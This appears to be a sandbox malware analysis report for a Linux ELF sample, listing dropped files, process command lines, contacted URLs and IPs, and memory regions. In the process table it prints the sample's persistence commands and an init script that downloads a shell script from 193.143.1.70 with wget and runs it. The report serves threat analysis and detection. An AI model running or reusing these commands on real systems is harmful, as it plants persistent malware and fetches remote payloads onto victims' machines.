Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
x86_32.nn.elf
|
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sh
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/x86_32.nn.elf
|
/tmp/x86_32.nn.elf
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget
http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n
killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sh
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sh /etc/rc.d/S99sh
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 47 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.24
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
82.145.57.36
|
unknown
|
United Kingdom
|
||
|
70.110.96.119
|
unknown
|
United States
|
||
|
67.50.24.205
|
unknown
|
United States
|
||
|
15.169.144.35
|
unknown
|
United States
|
||
|
55.162.183.121
|
unknown
|
United States
|
||
|
34.148.5.60
|
unknown
|
United States
|
||
|
67.61.151.106
|
unknown
|
United States
|
||
|
106.55.67.190
|
unknown
|
China
|
||
|
221.251.223.146
|
unknown
|
Japan
|
||
|
217.6.185.202
|
unknown
|
Germany
|
||
|
160.121.30.69
|
unknown
|
South Africa
|
||
|
90.31.155.156
|
unknown
|
France
|
||
|
214.75.199.57
|
unknown
|
United States
|
||
|
161.107.144.139
|
unknown
|
United States
|
||
|
211.157.3.45
|
unknown
|
China
|
||
|
160.233.161.24
|
unknown
|
Japan
|
||
|
110.197.233.210
|
unknown
|
China
|
||
|
114.86.108.11
|
unknown
|
China
|
||
|
65.191.232.142
|
unknown
|
United States
|
||
|
105.155.176.155
|
unknown
|
Morocco
|
||
|
175.228.244.125
|
unknown
|
Korea Republic of
|
||
|
28.143.56.29
|
unknown
|
United States
|
||
|
152.217.32.129
|
unknown
|
United States
|
||
|
206.100.157.253
|
unknown
|
United States
|
||
|
12.25.165.126
|
unknown
|
United States
|
||
|
2.225.143.236
|
unknown
|
Italy
|
||
|
128.123.38.2
|
unknown
|
United States
|
||
|
1.102.148.49
|
unknown
|
Korea Republic of
|
||
|
106.81.104.248
|
unknown
|
China
|
||
|
166.154.6.15
|
unknown
|
United States
|
||
|
149.12.235.61
|
unknown
|
United States
|
||
|
28.21.2.219
|
unknown
|
United States
|
||
|
128.214.247.115
|
unknown
|
Finland
|
||
|
154.148.78.225
|
unknown
|
Morocco
|
||
|
23.95.140.216
|
unknown
|
United States
|
||
|
202.247.63.251
|
unknown
|
Japan
|
||
|
52.207.186.68
|
unknown
|
United States
|
||
|
213.132.25.9
|
unknown
|
Denmark
|
||
|
28.226.179.229
|
unknown
|
United States
|
||
|
84.22.176.77
|
unknown
|
United Kingdom
|
||
|
3.99.230.17
|
unknown
|
United States
|
||
|
193.66.157.158
|
unknown
|
Finland
|
||
|
201.47.217.105
|
unknown
|
Brazil
|
||
|
203.190.244.120
|
unknown
|
Indonesia
|
||
|
110.76.215.189
|
unknown
|
China
|
||
|
203.97.17.107
|
unknown
|
New Zealand
|
||
|
121.223.243.251
|
unknown
|
Australia
|
||
|
100.26.60.214
|
unknown
|
United States
|
||
|
149.21.34.140
|
unknown
|
United States
|
||
|
191.221.133.112
|
unknown
|
Brazil
|
||
|
100.173.226.194
|
unknown
|
United States
|
||
|
102.122.153.39
|
unknown
|
Sudan
|
||
|
77.231.167.205
|
unknown
|
Spain
|
||
|
90.162.35.197
|
unknown
|
Spain
|
||
|
182.122.248.169
|
unknown
|
China
|
||
|
192.139.223.248
|
unknown
|
Canada
|
||
|
165.224.136.190
|
unknown
|
United States
|
||
|
193.102.227.116
|
unknown
|
Germany
|
||
|
1.172.66.223
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
63.53.149.7
|
unknown
|
United States
|
||
|
136.122.152.243
|
unknown
|
United States
|
||
|
148.85.55.243
|
unknown
|
United States
|
||
|
39.255.91.11
|
unknown
|
Indonesia
|
||
|
192.26.252.105
|
unknown
|
United States
|
||
|
49.248.129.110
|
unknown
|
India
|
||
|
38.134.93.88
|
unknown
|
United States
|
||
|
63.112.221.89
|
unknown
|
United States
|
||
|
48.230.230.118
|
unknown
|
United States
|
||
|
26.5.209.185
|
unknown
|
United States
|
||
|
185.16.29.206
|
unknown
|
Russian Federation
|
||
|
171.7.230.237
|
unknown
|
Thailand
|
||
|
42.48.230.69
|
unknown
|
China
|
||
|
12.133.1.86
|
unknown
|
United States
|
||
|
73.64.202.209
|
unknown
|
United States
|
||
|
153.136.118.212
|
unknown
|
Japan
|
||
|
210.106.222.137
|
unknown
|
Korea Republic of
|
||
|
196.26.44.28
|
unknown
|
South Africa
|
||
|
67.0.96.15
|
unknown
|
United States
|
||
|
13.28.144.41
|
unknown
|
United States
|
||
|
65.198.147.100
|
unknown
|
United States
|
||
|
187.120.31.173
|
unknown
|
Brazil
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
142.147.80.175
|
unknown
|
Canada
|
||
|
55.101.37.213
|
unknown
|
United States
|
||
|
85.196.99.33
|
unknown
|
Norway
|
||
|
47.253.2.162
|
unknown
|
United States
|
||
|
33.101.42.79
|
unknown
|
United States
|
||
|
215.178.221.152
|
unknown
|
United States
|
||
|
72.127.172.35
|
unknown
|
United States
|
||
|
12.45.107.166
|
unknown
|
United States
|
||
|
140.128.77.116
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
21.63.240.220
|
unknown
|
United States
|
||
|
201.54.249.122
|
unknown
|
Brazil
|
||
|
115.241.61.53
|
unknown
|
India
|
||
|
97.24.170.230
|
unknown
|
United States
|
||
|
4.236.87.72
|
unknown
|
United States
|
||
|
30.17.251.144
|
unknown
|
United States
|
||
|
76.150.243.185
|
unknown
|
United States
|
||
|
221.215.231.199
|
unknown
|
China
|
||
|
200.113.248.122
|
unknown
|
Haiti
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8060000
|
page execute read
|
|
||
|
8060000
|
page execute read
|
|
||
|
ffcb5000
|
page read and write
|
|||
|
9994000
|
page read and write
|
|||
|
8063000
|
page read and write
|
|||
|
8061000
|
page read and write
|
|||
|
ffcb5000
|
page read and write
|
|||
|
8061000
|
page read and write
|
|||
|
8063000
|
page read and write
|
|||
|
f7fdd000
|
page execute read
|
|||
|
998f000
|
page read and write
|
|||
|
f7fdd000
|
page execute read
|
|||
|
998f000
|
page read and write
|
There are 3 hidden memdumps, click here to show them.